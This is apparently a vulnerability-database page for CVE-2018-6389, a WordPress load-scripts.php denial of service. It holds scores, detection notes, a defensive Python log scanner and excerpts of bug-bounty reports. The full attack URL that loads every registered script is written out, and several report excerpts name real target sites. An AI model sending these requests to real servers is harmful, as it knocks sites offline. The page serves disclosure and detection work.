CVE-2018-6389
Published 2018-02-06
CVE-2018-6389: In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files…
Priority: P2 (67) · high · 7.5 (CVSS 3.0)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EXPLOIT
EPSS 73.10% (99.4th percentile)
In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
Affected (2 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | wordpress | — | — |
| wordpress | wordpress | <= 4.9.2 | — |
Detection & IOCs
url: /wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9
- Detect exploitation attempts by matching HTTP GET requests to /wp-admin/load-scripts.php with an excessively long query string (>=1000 chars), indicative of the full JS bundle DoS payload.
- A single exploit request causes the server to perform 181 I/O actions and return ~4MB of data; monitor for anomalously large responses from /wp-admin/load-scripts.php as a detection signal.
- The exploit rotates through a known set of User-Agent strings; correlating these UAs with high-volume requests to load-scripts.php can aid detection.
- Requests include a Cache-Control: no-cache header to bypass caching and force server-side I/O on every request; use this as an additional filter alongside load-scripts.php targeting.
- The vulnerability has never been acknowledged by the WordPress authors and there is no mitigation in the WordPress codebase itself; hardening must be applied at the web server or WAF layer.
- Caching the load-scripts.php response at the hosting/CDN layer effectively neutralises the attack by eliminating repeated server-side I/O.
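As an added example (not part of this CVE record), the detection signals above applied to constructed access-log lines in Python: the query-length and response-size thresholds follow the notes above, while the per-client rate threshold, the combined log format and the sample lines are assumptions.

```python
"""Flag load-scripts.php abuse (CVE-2018-6389 pattern) in combined-format
access logs. Signals: oversized query string, anomalously large response,
and a burst of hits from one client. Sample log lines are constructed."""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Combined log format (assumed): ip - - [time] "METHOD target HTTP/x" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\d+|-)'
)
TARGET_PATH = "/wp-admin/load-scripts.php"
QUERY_LEN_THRESHOLD = 1000        # from the detection notes (>=1000-char query)
RESPONSE_BYTES_THRESHOLD = 1_000_000  # ~4MB bodies are the signature; 1MB is a safe floor
RATE_THRESHOLD = 20               # hits per client; assumed value, tune per site


def parse_line(line):
    """Extract the fields the detector needs; None if the line does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    qs = parse_qs(parts.query)  # decodes load%5B%5D back to load[]
    # load-scripts.php accepts both load[]=a,b and load=a,b; count script names
    names = [n for k in ("load[]", "load") for v in qs.get(k, []) for n in v.split(",")]
    return {
        "ip": m.group("ip"),
        "path": parts.path,
        "query_len": len(parts.query),
        "script_count": len(names),
        "bytes": 0 if m.group("bytes") == "-" else int(m.group("bytes")),
    }


def classify(entry):
    """Per-request signals tripped by one parsed entry (empty list = benign)."""
    if entry is None or not entry["path"].endswith(TARGET_PATH):
        return []
    signals = []
    if entry["query_len"] >= QUERY_LEN_THRESHOLD:
        signals.append("long_query")
    if entry["bytes"] >= RESPONSE_BYTES_THRESHOLD:
        signals.append("large_response")
    return signals


def scan(lines):
    """Per-client summary {ip: (hits, sorted signals)} over the whole log."""
    per_ip = defaultdict(lambda: {"hits": 0, "signals": set()})
    for line in lines:
        entry = parse_line(line)
        if entry is None or not entry["path"].endswith(TARGET_PATH):
            continue
        per_ip[entry["ip"]]["hits"] += 1
        per_ip[entry["ip"]]["signals"].update(classify(entry))
    for stats in per_ip.values():
        if stats["hits"] >= RATE_THRESHOLD:
            stats["signals"].add("high_rate")
    return {ip: (s["hits"], sorted(s["signals"])) for ip, s in per_ip.items()}


# Constructed sample: one normal asset load, one oversized bundle request,
# and a burst of the oversized request from a second client.
_LONG_QUERY = "c=1&load%5B%5D=" + ",".join(f"script-{i:03d}" for i in range(150)) + "&ver=4.9"
SAMPLE_LOG = [
    f'10.0.0.5 - - [06/Feb/2018:10:00:01 +0000] "GET {TARGET_PATH}?c=1&load%5B%5D=jquery-ui-core,editor&ver=4.9 HTTP/1.1" 200 84213 "-" "Mozilla/5.0"',
    f'203.0.113.9 - - [06/Feb/2018:10:00:02 +0000] "GET {TARGET_PATH}?{_LONG_QUERY} HTTP/1.1" 200 4194304 "-" "Mozilla/5.0"',
] + [
    f'198.51.100.7 - - [06/Feb/2018:10:00:03 +0000] "GET {TARGET_PATH}?{_LONG_QUERY} HTTP/1.1" 200 4194304 "-" "curl/7.64"'
    for _ in range(25)
]

if __name__ == "__main__":
    for ip, (hits, signals) in scan(SAMPLE_LOG).items():
        print(ip, hits, signals)
```

Run against real logs by feeding file lines to `scan()`; a client carrying `long_query` plus `large_response` is the page's full-bundle pattern, and `high_rate` on top of that is the volume the DoS needs.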
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 7.5 | HIGH | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H |
| nvd | v2.0 | 5.0 | MEDIUM | AV:N/AC:L/Au:N/C:N/I:N/A:P |
| osv | — | 7.5 | HIGH | — |
| vendor_debian | — | 7.5 | LOW | — |
GHSA
GHSA-pxcx-cprx-mr28: In WordPress through 4
ghsa_unreviewed · 2022-05-14 · HIGH · CWE-400
In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
OSV
CVE-2018-6389: In WordPress through 4
osv · 2018-02-06 · CVSS 7.5 · HIGH
In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
Debian
CVE-2018-6389: wordpress - In WordPress through 4.9.2, unauthenticated attackers can cause a denial of serv...
vendor_debian · 2018 · CVSS 7.5 · HIGH
In WordPress through 4.9.2, unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
Scope: local
bookworm: open
bullseye: open
forky: open
sid: open
trixie: open
No detection rules found.
HackerOne
CVE-2018-6389 exploitation - using scripts loader
hackerone·2024-02-13·CVSS 7.5
Hi Team!
Unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
The vulnerability is registered as CVE-2018-6389.
WordPress allows users to load multiple JS files and CSS files through load-scripts.php files at once. However, the number and size of files are not restricted in the process of loading JS files; attackers can use this function to deplete server resources and launch denial of service attacks.
References
The vulnerability is registered as https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
https://hackerone.com/reports/925425
https://hackerone.c
HackerOne
CVE-2018-6389 exploitation - using scripts loader
hackerone·2023-04-20·CVSS 7.5
Hi Fastly Team!
Unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
The vulnerability is registered as CVE-2018-6389.
WordPress allows users to load multiple JS files and CSS files through load-scripts.php files at once. However, the number and size of files are not restricted in the process of loading JS files; attackers can use this function to deplete server resources and launch denial of service attacks.
**References**
The vulnerability is registered as https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
https://hackerone.com/reports/925425
https://
HackerOne
DoS at █████(CVE-2018-6389)
hackerone·2023-03-24·CVSS 7.5
**Description:**
Unauthenticated attackers can cause a denial of service (resource consumption) by listing a large number of registered .js files (from wp-includes/script-loader.php).
Vulnerable Url : https://██████████/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-e
HackerOne
DoS at ████████ (CVE-2018-6389)
hackerone·2023-02-24·CVSS 7.5
Hi DoD Team!
## Description
Unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
The vulnerability is registered as [CVE-2018-6389](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389).
WordPress allows users to load multiple JS files and CSS files through load-scripts.php files at once. However, the number and size of files are not restricted in the process of loading JS files; attackers can use this function to deplete server resources and launch denial of service attacks.
## Vulnerability
https://███/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,col
HackerOne
DoS of https://research.adobe.com/ via CVE-2018-6389 exploitation
hackerone·2022-10-13·CVSS 7.5
The researcher successfully exploited CVE-2018-6389 on https://research.adobe.com/. We appreciate the collaboration and the responsible disclosure.
HackerOne
[mtn.com.af] Multiple vulnerabilities allow to Application level DoS
hackerone·2021-09-28·CVSS 7.5
**Issue Description**
Unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
The vulnerability is registered as [CVE-2018-6389] #761722 #752010 #753491 #335177
**CVE ID Risk Score**
[CVE-2018-6389 7.5](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389)
Platform(s) Affected: [website]
*.https://www.mtn.com.af/wp-admin/load-scripts.php?load=
### Steps To Reproduce:
* Open Vulnerability url - open directory ``/wp-admin/load-scripts.php?load=``
* Add ``parameter-vulnerable`` in request header
* In request header using GET-Method
* Show url o
HackerOne
CVE-2018-6389 exploitation - using scripts loader
hackerone·2021-08-18·CVSS 7.5
**Issue Description**
Unauthenticated attackers can cause a denial of service (resource consumption) by using the large list of registered .js files (from wp-includes/script-loader.php) to construct a series of requests to load every file many times.
The vulnerability is registered as [CVE-2018-6389] #761722 #752010 #753491 #335177
**CVE ID Risk Score**
[CVE-2018-6389 7.5](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389)
Platform(s) Affected: [website]
*.[https://www.mtn.zm/wp-admin/load-scripts.php?load=](https://www.mtn.zm/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scrip
HackerOne
Possibility of DoS attack at https://sifchain.finance// via CVE-2018-6389 exploitation
hackerone·2021-05-07·CVSS 7.5
There is a possibility in the /wp-admin/load-scripts.php script to generate a large (~3Mb) amount of data via a simple non-authenticated request to the server.
The vulnerability is registered as https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
Details
Detailed attack scenario is described for example here: https://baraktawily.blogspot.ru/2018/02/how-to-dos-29-of-world-wide-websites.html
I have an Apache JMeter script which is able to simulate necessary loading for your site (can be provided to you if necessary).
URL:
https://sifchain.finance/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbea
Bugzilla
Critical Vulnerability Report: load-scripts.php allows attacker to temporarily down website
bugzilla · 2021-01-17
Created attachment 9197597
aa.jpg
User Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Steps to reproduce:
Hi Team,
Summary
The load-scripts.php file receives a parameter called load[], the parameter value is ‘jquery-ui-core’. In the response, I received the JS module ‘jQuery UI Core’ that was requested.
What can be concluded from this URL, is that it is probably meant to supply users with some JS modules. In addition, the load[] parameter is an array, which means that it is possible to provide multiple values and be able to get multiple JS modules within the response.
I wondered what would happen if I sent the server a reques
HackerOne
scripts loader (denial of service) vulnerability
hackerone·2020-03-19·CVSS 7.5
1) vulnerability description
WordPress allows users to load multiple JS files and CSS files through load-scripts.php files at once. For example, https://wpwebsite.com/wp-admin/load-scripts.php?c=1&load[]=jquery-ui-core,editor&ver=4.9.1, file load-scripts.php will load jquery-ui-core and editor files automatically and return the contents of the file.
However, the number and size of files are not restricted in the process of loading JS files; attackers can use this function to deplete server resources and launch denial of service attacks.
(check references for more details about the vulnerability)
2) attack details
*affected link : https://mariadb.org/wp-admin/load-scripts.php
*proof of concept ( description );
the load-scripts.php file
HackerOne
scripts loader DOS vulnerability
hackerone·2020-02-29·CVSS 7.5
1) vulnerability description
WordPress allows users to load multiple JS files and CSS files through load-scripts.php files at once. For example, https://wpwebsite.com/wp-admin/load-scripts.php?c=1&load%5B%5D=jquery-ui-core,editor&ver=4.9.1, file load-scripts.php will load jquery-ui-core and editor files automatically and return the contents of the file.
However, the number and size of files are not restricted in the process of loading JS files; attackers can use this function to deplete server resources and launch denial of service attacks.
(check references for more details about the vulnerability)
2) attack details
*affected link : https://www.formassembly.com/wp-admin/load-scripts.php
*proof of concept ( description );
the load-scripts.php file wa
HackerOne
DoS of https://blog.makerdao.com/ via CVE-2018-6389
hackerone·2020-02-18·CVSS 7.5
HackerOne
DoS of https://blog.yelp.com/ and other WP instances via CVE-2018-6389
hackerone·2020-01-17·CVSS 7.5
Description:
There is a possibility in the /wp-admin/load-scripts.php script to generate a large (~3Mb) amount of data via a simple non-authenticated request to the server.
The vulnerability is registered as https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
Details:
Detailed attack scenario is described for example here: https://baraktawily.blogspot.ru/2018/02/how-to-dos-29-of-world-wide-websites.html
Affected URL:
https://www.yelpreservations.com/blog/wp-admin/load-scripts.php?load=common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-ef
HackerOne
DoS https://iandunn.name/ via CVE-2018-6389 exploitation
hackerone · 2020-01-09 · CVSS 7.5
Similar to #752010
Detail:-
There is a possibility in the /wp-admin/load-scripts.php script to generate a large (~3Mb) amount of data via a simple non-authenticated request to the server.
The vulnerability is registered as https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
Detailed attack scenario is described for example here: https://baraktawily.blogspot.ru/2018/02/how-to-dos-29-of-world-wide-websites.html
I have an Apache JMeter script which is able to simulate necessary loading for your site (can be provided to you if necessary)
vuln url:-
```
https://iandunn.name///wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat
```
HackerOne
DoS of https://nordvpn.com/ via CVE-2018-6389 exploitation
hackerone·2020-01-08·CVSS 7.5
There is a possibility in the /wp-admin/load-scripts.php script to generate a large (~3Mb) amount of data via a simple non-authenticated request to the server.
The vulnerability is registered as https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-6389
Details
Detailed attack scenario is described for example here: https://baraktawily.blogspot.ru/2018/02/how-to-dos-29-of-world-wide-websites.html
I have an Apache JMeter script which is able to simulate necessary loading for your site (can be provided to you if necessary).
The ready-to-call URL is the following:
https://nordvpn.com/wp-admin/load-scripts.php?load=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-au
arXiv
Microservice Vulnerability Analysis: A Literature Review with Empirical Insights
arxiv_fulltext · 2024-07-31
Raveen Kanishka Jayalath* (University of Adelaide, Australia)
Hussain Ahmad* (University of Adelaide, Australia)
Diksha Goel (CSIRO's Data61, Australia)
Muhammad Shuja Syed (SLB, USA)
Faheem Ullah (University of Adelaide, Australia)
*Authors contributed equally to this work. Corresponding author.
## Abstract
Microservice architectures are revolutionizing both small businesses and large corporations, igniting a new era of innovation with their exceptional advantages in maintainability, reusability, and scalability. However, these benefits come w
References
- http://www.securityfocus.com/bid/103060
- http://www.securitytracker.com/id/1040347
- https://baraktawily.blogspot.fr/2018/02/how-to-dos-29-of-world-wide-websites.html
- https://github.com/UltimateHackers/Shiva
- https://github.com/WazeHell/CVE-2018-6389
- https://thehackernews.com/2018/02/wordpress-dos-exploit.html
- https://wpvulndb.com/vulnerabilities/9021
- https://www.exploit-db.com/exploits/43968/
Published 2018-02-06